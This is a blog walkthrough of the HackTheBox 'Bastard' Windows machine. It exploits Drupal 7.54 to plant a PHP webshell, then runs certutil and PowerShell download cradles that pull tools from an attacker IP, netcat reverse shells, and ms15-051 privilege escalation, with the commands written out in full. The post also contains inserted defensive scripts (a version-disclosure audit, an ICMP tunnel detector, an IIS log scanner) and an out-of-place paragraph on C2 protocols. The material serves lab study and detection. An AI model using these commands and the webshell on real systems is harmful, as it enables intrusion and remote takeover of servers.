No.53 - HackTheBox Windows "Bastard" Walkthrough (penetration study)

Target address: https://www.hackthebox.eu/home/machines/profile/6
Target difficulty: Medium (4.7 / 10)
Target release date: October 14, 2017
Target description:
Bastard is not overly challenging, however it requires some knowledge of PHP in order to modify and use the proof of concept required for initial entry. This machine demonstrates the potential severity of vulnerabilities in content management systems.
Author: Dayu
Time: 2020-02-13
Note: for all of these machines I was authorized by the platform to carry out the penetration test. I use Kali Linux as the attacker machine for solving HTB boxes. The techniques used here are for learning and educational purposes only; if the techniques listed are used for any other purpose, I am not responsible.

Part 1: Information gathering

[screenshot]
The target IP is 10.10.10.9, and it is a Windows machine ...
[screenshot]
nmap found only ports 80, 135 and 49154 (msrpc) open ...
[screenshot]
This is a Drupal 7 CMS web server ... the CHANGELOG.txt file discloses the exact Drupal release, among other things ...
[screenshot]
[screenshot]
whatweb shows the same ...
The version is Drupal 7.54 ...
[screenshot]
[screenshot]
With searchsploit -x 41564.php you can find an exploit that can be used ...
For 7.54 I went with the exploit for the Drupal 7.x Services module ...
[screenshot]
Command: ./droopescan scan drupal -u 10.10.10.9 (the server was hostile to me, or rather my network connection is often unstable)
I also used the droopescan script to scan the target's Drupal for anything usable ... link
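The recon above reads the exact Drupal release from CHANGELOG.txt and whatweb. The Python script below is an added example, not the walkthrough author's code: it runs the same check from the defender's side against a local webroot, reporting which of the text files a Drupal 7 release ships in its root (an assumed list) are present and which version CHANGELOG.txt discloses to any anonymous visitor. The sample webroot it builds in a temporary directory is constructed for the demonstration.

```python
"""Self-audit of a Drupal 7 webroot for version-disclosing files.

Added example (not the walkthrough author's code). Given a webroot path it
lists the shipped text files that are still web-accessible and parses the
newest release named in CHANGELOG.txt, which is exactly what an anonymous
visitor learns before those files are removed or blocked.
"""
import os
import re
import tempfile

# Text files shipped in the root of a Drupal 7 release (assumed list).
DRUPAL7_DISCLOSURE_FILES = [
    "CHANGELOG.txt", "COPYRIGHT.txt", "INSTALL.txt", "INSTALL.mysql.txt",
    "INSTALL.pgsql.txt", "INSTALL.sqlite.txt", "LICENSE.txt",
    "MAINTAINERS.txt", "README.txt", "UPGRADE.txt",
]

# Drupal's CHANGELOG.txt opens each release block with "Drupal X.Y, YYYY-MM-DD".
VERSION_RE = re.compile(r"^Drupal\s+(\d+\.\d+(?:\.\d+)?)\s*,", re.MULTILINE)


def version_from_changelog(text):
    """Return the first (newest) release named in a CHANGELOG.txt body, or None."""
    m = VERSION_RE.search(text)
    return m.group(1) if m else None


def audit_webroot(webroot):
    """Report which disclosure files are present and what version they leak."""
    present = [f for f in DRUPAL7_DISCLOSURE_FILES
               if os.path.isfile(os.path.join(webroot, f))]
    version = None
    changelog = os.path.join(webroot, "CHANGELOG.txt")
    if os.path.isfile(changelog):
        with open(changelog, encoding="utf-8", errors="replace") as fh:
            version = version_from_changelog(fh.read())
    return {"exposed_files": present, "version": version}


def build_sample_webroot():
    """Construct a throwaway webroot resembling the target in the walkthrough."""
    root = tempfile.mkdtemp(prefix="drupal-audit-")
    with open(os.path.join(root, "CHANGELOG.txt"), "w", encoding="utf-8") as fh:
        # Constructed sample content in the CHANGELOG.txt layout.
        fh.write("Drupal 7.54, 2017-02-01\n-----------------------\n"
                 "- Constructed sample entry.\n\n"
                 "Drupal 7.53, 2016-12-07\n-----------------------\n")
    with open(os.path.join(root, "README.txt"), "w", encoding="utf-8") as fh:
        fh.write("constructed placeholder\n")
    return root


if __name__ == "__main__":
    sample = build_sample_webroot()
    report = audit_webroot(sample)
    print("exposed files:", report["exposed_files"])
    print("version disclosed:", report["version"])
```

Point it at a real webroot instead of the constructed one (`audit_webroot("/var/www/html")`) to see what your own install gives away; anything in `exposed_files` is a candidate for deletion or a deny rule on the web server.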
Going back to 41564.php: copy the script locally and modify it ...
[screenshot]
Code: echo(system($_GET["cmd"])); or system($_REQUEST["cmd"]);
Before running it, php-curl must be installed: apt-get install php-curl
At first I used the endpoint name rest_endpoint without success; after changing it to rest it worked ... the main clue was that dirb found a rest directory ...
[screenshot]
dirb found rest, and visiting it also worked ...
[screenshot]
The exploit ran successfully and produced session.json and user.json ...
Before that, the PHP errored out several times; after a few rounds of debugging, there were two small places that needed adjusting ...
[screenshot]
[screenshot]
Two places need to be adjusted ... otherwise it errors ...
The exploit then runs successfully ...
[screenshot]
Through the cmd parameter of the PHP file, commands can already be run and files written on the Windows host can be read ...
[screenshot]
Next, session.json is used for session hijacking ...
In Firefox, add the session from session.json via the Tools menu
[screenshot]
You can also see that this is an x64 system ...
[screenshot]
Add it ...
[screenshot]
The admin user is now logged in to the interface ...
At this point I know two ways to upload a shell payload to the target ...

Non-standard application layer protocols

Communication between a remote control server and the host may use a non-standard application layer protocol, and a wide variety of different protocols can be used. Specific examples include network layer protocols such as the Internet Control Message Protocol (ICMP), transport layer protocols such as the User Datagram Protocol (UDP), session layer protocols such as SOCKS, and redirection/tunneling protocols such as Serial over LAN (SOL).

Using ICMP for communication between hosts works because ICMP is part of the Internet Protocol Suite, so every IP-capable host implements it. However, it is not monitored as closely as TCP, UDP and other network protocols, so an attacker can use it to hide traffic.
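The passage above says ICMP is implemented everywhere but rarely watched. As an added example, not part of the original post, the script below is a minimal detector over per-packet ICMP summaries (timestamp, source, destination, ICMP type, payload length), the fields a sensor or a pcap export gives you. It flags sources whose echo requests carry oversized or constantly changing payloads, or arrive in bulk. The thresholds, the "normal" payload sizes and the sample packet records are assumptions constructed for the demonstration.

```python
"""Flag ICMP echo traffic that does not look like ordinary ping.

Added example, not from the original post. Ordinary echo requests carry a
small fixed payload (56 bytes from Linux ping, 32 bytes from Windows ping);
a stream of large or varying payloads, or a burst of requests, is what an
ICMP tunnel looks like on the wire. Thresholds below are assumptions.
"""
from collections import defaultdict

MAX_NORMAL_PAYLOAD = 64       # bytes; assumed threshold
MAX_DISTINCT_SIZES = 3        # assumed: ping repeats one size
MAX_REQUESTS_PER_WINDOW = 50  # echo requests per source per window; assumed
WINDOW_SECONDS = 60
ECHO_REQUEST = 8              # ICMP type 8

# Constructed records: (timestamp, src, dst, icmp_type, payload_len)
SAMPLE_PACKETS = [
    (1000.0, "10.0.0.5", "10.0.0.1", 8, 56),   # normal Linux ping
    (1001.0, "10.0.0.5", "10.0.0.1", 8, 56),
    (1002.0, "10.0.0.7", "10.0.0.1", 8, 32),   # normal Windows ping
    (1002.1, "10.0.0.1", "10.0.0.7", 0, 32),   # echo reply, ignored
] + [
    # tunnel-like stream: many requests with large, changing payloads
    (1010.0 + i * 0.2, "10.0.0.9", "203.0.113.10", 8, 900 + (i * 37) % 400)
    for i in range(80)
]


def analyse_icmp(packets):
    """Return (src, reason) findings for suspicious echo-request traffic."""
    by_src = defaultdict(list)
    for ts, src, _dst, itype, plen in packets:
        if itype == ECHO_REQUEST:
            by_src[src].append((ts, plen))

    findings = []
    for src, events in by_src.items():
        sizes = {plen for _, plen in events}
        if max(sizes) > MAX_NORMAL_PAYLOAD:
            findings.append((src, "oversized echo payload (%d bytes)" % max(sizes)))
        if len(sizes) > MAX_DISTINCT_SIZES:
            findings.append((src, "%d distinct payload sizes" % len(sizes)))
        # Sliding window over sorted timestamps: flag once if any window
        # holds more than MAX_REQUESTS_PER_WINDOW requests.
        times = sorted(ts for ts, _ in events)
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > WINDOW_SECONDS:
                start += 1
            if end - start + 1 > MAX_REQUESTS_PER_WINDOW:
                findings.append((src, "more than %d echo requests in %ds"
                                 % (MAX_REQUESTS_PER_WINDOW, WINDOW_SECONDS)))
                break
    return findings


if __name__ == "__main__":
    for src, reason in analyse_icmp(SAMPLE_PACKETS):
        print("%s: %s" % (src, reason))
```

Only the 10.0.0.9 stream fires, on all three rules; the two ordinary pings and the echo reply do not. In a real deployment feed the function from a pcap or flow export and tune the thresholds to the monitoring tools that legitimately ping the network.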
Please bear with what follows ...

Method 1:

Download nc via certutil
[screenshot]
[screenshot]
Command: http://10.10.10.9/dayuxiyou.php?cmd=certutil%20-urlcache%20-f%20http://10.10.14.16:8000/nc64.exe nc64.exe
Successfully downloaded to the Windows host ...
[screenshot]
Command: http://10.10.10.9/dayuxiyou.php?cmd=certutil -urlcache -f http://10.10.10.9/nc64.exe nc64.exe
Reverse shell obtained ...

Method 2:

Using a hand-written PHP file ...
[screenshot]
The dayu parameter is configured to execute requests, and fupload handles the download ...
[screenshot]
Command:

$url = 'http://10.10.10.9/';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

$phpCode = <<<'EOD'
<?php
    // fupload: fetch the named file from the attacker's web server and save it under the same name
    if (isset($_REQUEST['fupload'])) {
        file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.14.16:8000/" . $_REQUEST['fupload']));
    }

    // dayu: run the given command and return its output
    if (isset($_REQUEST['dayu'])) {
        echo "<pre>" . shell_exec($_REQUEST['dayu']) . "</pre>";
    }
?>
EOD;

$file = [
    'filename' => 'dayuxiyou.php',
    'data' => $phpCode
];


Check that the PHP executes normally ...
[screenshot]
Run it again ...
Command: http://10.10.10.9/dayuxiyou.php?fupload=nc64.exe (uploads nc.exe)
[screenshot]
Command: http://10.10.10.9/dayuxiyou.php?dayu=nc64.exe&dayu=nc64.exe -e cmd 10.10.14.16 6001
Reverse shell obtained ...

Method 3:

Use the smbserver that ships with Kali and share a directory ...
Find it with locate smbserver.py ...
[screenshot]
Command: python /root/Desktop/dayuBastard/smbserver.py dayugongxiang /var/www/html/
This opens a share named dayugongxiang; then just put nc64.exe or nc.exe in the html directory ...
[screenshot]
[screenshot]
Command: 10.10.10.9/dayuxiyou.php?dayu=copy \\10.10.14.16\dayugongxiang\nc64.exe nc64.exe
The file has been copied in successfully ...
[screenshot]
Reverse shell obtained ...

Method 4:

Escalate using the officially described method ...
[screenshot]
"PHP execution can be achieved by enabling the PHP filter module on the Modules page. After that, simply browse to Add content and then Article. Paste the PHP into the article body, change the Text format to PHP code, and click Preview to execute the code easily." ---- official text, translated ...
[screenshot]
Find the PHP module under Modules; it is unchecked by default, so check it and save ...
[screenshot]
[screenshot]
[screenshot]
PHP code for privilege escalation: link
[screenshot]
[screenshot]
Then just preview ...
[screenshot]
Through this method alone you already have administrator ... it is simpler to use, and it is also one of the methods given officially ...

Using PowerShell Empire - PowerUp.ps1

PowerShell Empire is a post-exploitation framework for computers and servers running Microsoft Windows and/or Windows Server operating systems ...
[screenshot]
[screenshot]
Note: PowerUp.ps1 runs inside Windows, so we need to add "Invoke-AllChecks" at the bottom of the file and save it ...
[screenshot]
Command: http://10.10.10.9/dayuxiyou.php?dayu=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.16:8000/PowerUp.ps1') | powershell -noprofile -
Then use PowerShell to upload and run PowerUp.ps1 ...
After a few minutes, the result shows access denied, which means we do not have administrator privileges ...

Using PowerShell Empire - Sherlock.ps1

The Sherlock.ps1 script quickly finds missing software patches, discovering local privilege escalation vulnerabilities ...
Use sherlock.ps1 to look for vulnerabilities ...
[screenshot]
[screenshot]
The file needs editing to call Find-AllVulns; just add it at the end of the file ...
Command: /root/.local/share/Trash/files/Sherlock/Sherlock.ps1
[screenshot]
[screenshot]
[screenshot]
Command: http://10.10.10.9/dayuxiyou.php?dayu=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.16:8000/Sherlock.ps1') | powershell -noprofile -
"Appears Vulnerable" means the vulnerability is present ... it can be exploited ... let's look around here
In the scan results, only ms10-092, ms15-051 and ms16-032 were found to be exploitable ...
Exploit exe for the vulnerabilities found by Sherlock.ps1: link
[screenshot]
The download address was given above ...
Use ms15-051x64.exe ...

user.txt obtained

[screenshot]
[screenshot]

root.txt obtained

certutil:

[screenshot]
Command: certutil -urlcache -f http://10.10.14.16:8000/ms15-051x64.exe dayucertutil.exe
[screenshot]
Command: dayucertutil.exe "nc.exe 10.10.14.16 6006 -e cmd.exe"

PHP privilege escalation:

[screenshot]
Uploading ms15-051.exe does not work because "-" is not supported ... rename it locally ...
[screenshot]
[screenshot]
The command output is returned successfully ...
[screenshot]
Command: http://10.10.10.9/dayuxiyou.php?fupload=dayums.exe&dayu=dayums.exe "nc64.exe -e cmd 10.10.14.16 6007"
Privilege escalation succeeded ...

smbserver:

[screenshot]
Using the smbserver shared directory also works: escalate and read root.txt ... (the root hash is not published ... keep learning on your own)
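Every method in this walkthrough (the certutil download in Method 1, the fupload/dayu parameters in Method 2, the copy from the attacker's SMB share in Method 3, the PowerUp/Sherlock download cradles, and the final nc64 -e escalation command) went through the dropped dayuxiyou.php, so each one is visible in the web server's own log as a query string. The Python scanner below is an added example, not part of the original post: it parses the W3C format IIS writes, decodes the query and matches a few indicators. The log lines are constructed from the URLs in the post (with `+` standing for spaces, as in an IIS query field), the field header is a subset of the IIS default, and the list of PHP files a stock Drupal 7 root legitimately serves is an assumption.

```python
"""Scan IIS W3C web logs for the webshell activity shown in this walkthrough.

Added example, not part of the original post. Parses the #Fields header so
any IIS field layout works, URL-decodes cs-uri-query, and reports requests
that match a download cradle, a UNC copy from another host, netcat with -e,
or a .php file that a stock Drupal 7 root would not contain.
"""
import re
from urllib.parse import unquote_plus

# PHP files a stock Drupal 7 root legitimately serves (assumed list).
DRUPAL7_CORE_PHP = {"/index.php", "/cron.php", "/update.php", "/install.php",
                    "/authorize.php", "/xmlrpc.php"}

INDICATORS = [
    ("certutil download", re.compile(r"certutil\b.*-urlcache", re.I)),
    ("PowerShell download cradle",
     re.compile(r"New-Object\s+Net\.WebClient|DownloadString|\bIEX\b", re.I)),
    ("powershell invocation", re.compile(r"\bpowershell\b", re.I)),
    ("UNC copy from remote host", re.compile(r"\\\\\d{1,3}(?:\.\d{1,3}){3}\\")),
    ("netcat reverse shell (-e)", re.compile(r"\bnc(?:64)?\.exe\b.*\s-e\s", re.I)),
]

# Constructed sample log built from the URLs in the walkthrough.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2020-02-13 10:01:02 10.10.10.9 GET /CHANGELOG.txt - 80 - 10.10.14.16 Mozilla/5.0 200
2020-02-13 10:05:10 10.10.10.9 GET /dayuxiyou.php cmd=certutil+-urlcache+-f+http://10.10.14.16:8000/nc64.exe+nc64.exe 80 - 10.10.14.16 Mozilla/5.0 200
2020-02-13 10:07:30 10.10.10.9 GET /dayuxiyou.php dayu=copy+\\10.10.14.16\dayugongxiang\nc64.exe+nc64.exe 80 - 10.10.14.16 Mozilla/5.0 200
2020-02-13 10:09:00 10.10.10.9 GET /dayuxiyou.php dayu=echo+IEX(New-Object+Net.WebClient).DownloadString('http://10.10.14.16:8000/Sherlock.ps1')+|+powershell+-noprofile+- 80 - 10.10.14.16 Mozilla/5.0 200
2020-02-13 10:11:00 10.10.10.9 GET /dayuxiyou.php fupload=dayums.exe&dayu=dayums.exe+"nc64.exe+-e+cmd+10.10.14.16+6007" 80 - 10.10.14.16 Mozilla/5.0 200
2020-02-13 10:12:00 10.10.10.9 GET /node/1 - 80 - 10.10.14.20 Mozilla/5.0 200
"""


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            values = line.split(" ")
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def scan_entry(entry):
    """Return the indicator names that fire on one parsed log entry."""
    stem = entry.get("cs-uri-stem", "").lower()
    query = entry.get("cs-uri-query", "-")
    decoded = unquote_plus(query) if query != "-" else ""
    hits = [name for name, rx in INDICATORS if rx.search(decoded)]
    if stem.endswith(".php") and stem not in DRUPAL7_CORE_PHP:
        hits.append("non-core .php requested")
    return hits


def scan_log(text):
    """Return findings for every request with at least one indicator."""
    findings = []
    for entry in parse_w3c(text):
        hits = scan_entry(entry)
        if hits:
            findings.append({"time": entry["date"] + " " + entry["time"],
                             "client": entry["c-ip"],
                             "stem": entry["cs-uri-stem"],
                             "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["client"], f["stem"], ", ".join(f["indicators"]))
```

On the constructed log the four dayuxiyou.php requests are reported and the CHANGELOG.txt and /node/1 requests are not. The "non-core .php" rule is the cheapest one to keep: a PHP file that was never part of the deployment being requested with parameters is the webshell itself, independent of what command it carries.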

Four different methods were used here to penetrate the Windows target ... From now on I will approach every target in the spirit of giving a hundred percent and trying every way in that I can think of ... hopefully this helps me remember the methods more deeply. Come on!!

There is still a lot that I did not write out; the two other possible exploits, ms16-032 and ms10-092, are not written up. I tried them and found them feasible: generate an exe with MSF, place it on the Windows desktop via the share, and then escalate with it ...

Keep generating ideas, no matter how crazy or far-fetched they seem, and use your grey matter to build new associations between them.

I hope someone can share with me other ways of owning this target that I have not used!!!

Since we now have root privileges and have viewed user.txt and root.txt, this simple target is complete. I hope you like this machine; please keep following, there will be more challenging machines later, and learn by practicing along.

If you have other methods, leave a message. If there is something wrong, you must tell me. If you find this blog well written, share it with the people around you.


Origin blog.csdn.net/qq_34801745/article/details/104277881